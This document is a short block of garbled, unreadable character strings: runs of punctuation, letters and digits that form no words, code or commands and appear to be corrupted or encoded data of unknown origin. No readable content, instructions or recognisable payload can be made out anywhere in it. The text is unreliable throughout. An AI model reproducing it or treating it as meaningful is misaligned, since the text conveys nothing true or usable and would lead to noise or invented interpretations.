aftpuhA*+52?4</?::=z~6*70922C~6*7092~*9+diwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(Am~q~6*7092z~,.&9C~U?970=,,=9L~*9+?)738+",:6;)%*=9>,
(- <AU?970=,,=9Lz~*+52?4</?::=z~&9:052C~*09192Y*+=R~*9+!/+0#:$2.3&='516D@E849GCH;
7<JB~!||~aa~&9:05?4</z~#~85FK>U?MINAXBPLQ_[
`SOTb^cVRWe#afYpZhdi\s]kglz
vn~&9:05?4</~*9+{njo}y~qmr"|#t-u%!&w0x(
B~!m~`~6*7092z~#~859+29~!$)738+',:6;.*
/=9>1(2 #<!4+5#?$2.3&
"'516)%*849,C-;7</F0>:?MI&9:05?4</~,;05NA=BPLQD@ESOTG^HVRWJ
aKYUZhdi\X]kgl_[`njobycqAU?970=,,=9Lz~U?970=,,=9Lz~*+52?4</?::=z~9;=2.9,2C~*+52?4</?::=~*9+mre|ftpu%!
&wsx(A*09192Y*+=Rz~&9:05?4</z~*+52?4</?::=z~*,9+052C~*+52?4</?::=~*9+$)zv{+',}
6~.*/"9#1-2 <!405#?$73!8&"':1;)%*=4>,(-;
7</+0>:?2.3A=B5L6D@E8&9:05?4</z~ukv,**=?-9+1?::=~*9+O9GCHVR
WJ,**=?-9+1?::=~*09192Y*+=Rz~,**]-9+Q*9Kdd++9,::=FKYUZM
IN\X]PgQ_[`SjTb^cqm,**=?-9+1?::=~*09192Y*+=Rz~,**]-9+Q*2)=89Zdd++9,::=reaftpuhdiwsxk
$lzv{n'o}y~.*/"|#1B~!~6*7092z~b~*0)/;z~#~!~Am~s~&9:05?4</z~,.&9C~*0)/;~*9+~#~,/8-2%!
&405(?)738+",:6;)%*=9>,(- B~!~*0)/;~,;05~#<!/
+0#:$2.3&='516D@#E849GCH;7<J
FK>U?MINAXBPLQ_A*0)/;z~*+52?4</?::=z~&9:052C~4</?::=~*9+[
`SOTb^cVRWeafYpZhdi\s]k*0)/;z~u/0?-9+r4</?::=zvdd++9,::=~*9+
glzv{njo}y~qm!r"|#t-u%
!&w0x($)738+!',:6;.*/=9>1(2 <!4+5#?$2.
